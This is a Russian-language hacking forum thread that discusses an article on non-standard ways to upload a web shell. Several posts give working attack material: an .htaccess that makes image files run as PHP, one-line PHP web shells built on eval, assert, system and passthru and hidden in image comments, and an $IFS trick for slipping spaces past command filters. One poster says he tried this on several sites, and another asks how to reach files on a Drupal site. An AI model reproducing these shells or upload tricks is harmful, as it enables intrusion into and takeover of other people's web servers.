Авторские статьи Не стандартные способы заливки шелла

Discussion in 'Статьи' started by Osstudio, 11 Dec 2011.

  1. yaskin

    yaskin New Member

    Joined:
    28 Oct 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    вопрос только как создать/залить такой .htaccess
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    в чем, конкретно, проблема? объясните всю ситуацию
     
    _________________________
  3. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    $IFS defaults to whitespace (space, tab, and newline), but may be changed, for example, to parse a comma-separated data file. Note that $* uses the first character held in $IFS.

    Code:
    ls$IFS-la
     
  4. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Уже на нескольких сайтах перепробовал, везде при запросе
    Code:
    http://сайт/картинка.gif?cmd=phpinfo();
    открывается просто картинка. В чем может быть причина?
     
  5. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
    Сделай .gif исполняемую как .php в .htaccess
     
  6. TopTG

    TopTG New Member

    Joined:
    14 Oct 2015
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    А может подскажите как получить доступ к файлам если установлен Drupal 7.34, нет доступа к mysql, есть доступ к админке под юзером, где нет возможности не загрузить ни картинку ни модуль..
     
  7. GTAlex

    GTAlex New Member

    Joined:
    7 Sep 2009
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Хорошая статья - а чего ТС в бане?
    только хотел плюсануть ...
     
  8. putinrub

    putinrub New Member

    Joined:
    18 Sep 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Залит файл .htaccess, содержимое следующее:
    Code:
    AddType application/x-httpd-php .jpg .gif
    AddHandler application/x-httpd-php .jpg .gif
    
    <IfModule mod_mime.c>
    AddType application/x-httpd-php .jpg .gif
    </IfModule>
    
    <FilesMatch "\.(jpg|gif|png|bmp)$">
    SetHandler application/x-httpd-php
    </FilesMatch>
    img.jpg (внутри обычный код шелла 96kb)
    > Изображение "img.jpg" не может быть показано, так как содержит ошибки.

    img2_exif.jpg?cmd=phpinfo(); [ Внутри комментарий <?eval($_GET[cmd])?> ]
    > Открывается обычная картинка, больше ничего не происходит.

    img.gif?cmd=phpinfo(); [ Внутри комментарий <?assert($_REQUEST[cmd])?> ]
    > Открывается обычная картинка 1px, больше ничего не происходит.

    Тестирую на своём хостинге, если же просто залить img.php с содержимым:

    Code:
    + <?eval($_GET[cmd])?>
    + <?eval($_REQUEST[cmd])?>
    <?passthru($_GET[cmd])?>
    <?passthru($_REQUEST[cmd])?>
    <?system($_GET[cmd])?>
    <?system($_REQUEST[cmd])?>
    + <?assert($_GET[cmd])?>
    + <?assert($_REQUEST[cmd])?>
    И перейти по img.php?cmd=phpinfo(); [ Всё отлично работает, пробовал разный код, плюсами выделил с которыми всё работает ]

    Характеристики: PHP Version 5.6.36 / Apache 2.2.15 (CentOS)

    Куда копать и почему не работает?
    Браузеры разные пробовал, думал дело в них...
     
  9. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    15
    Likes Received:
    8
    Reputations:
    3
    Решили вопрос?
    Если нет, то посмотреть вывод phpinfo() надо.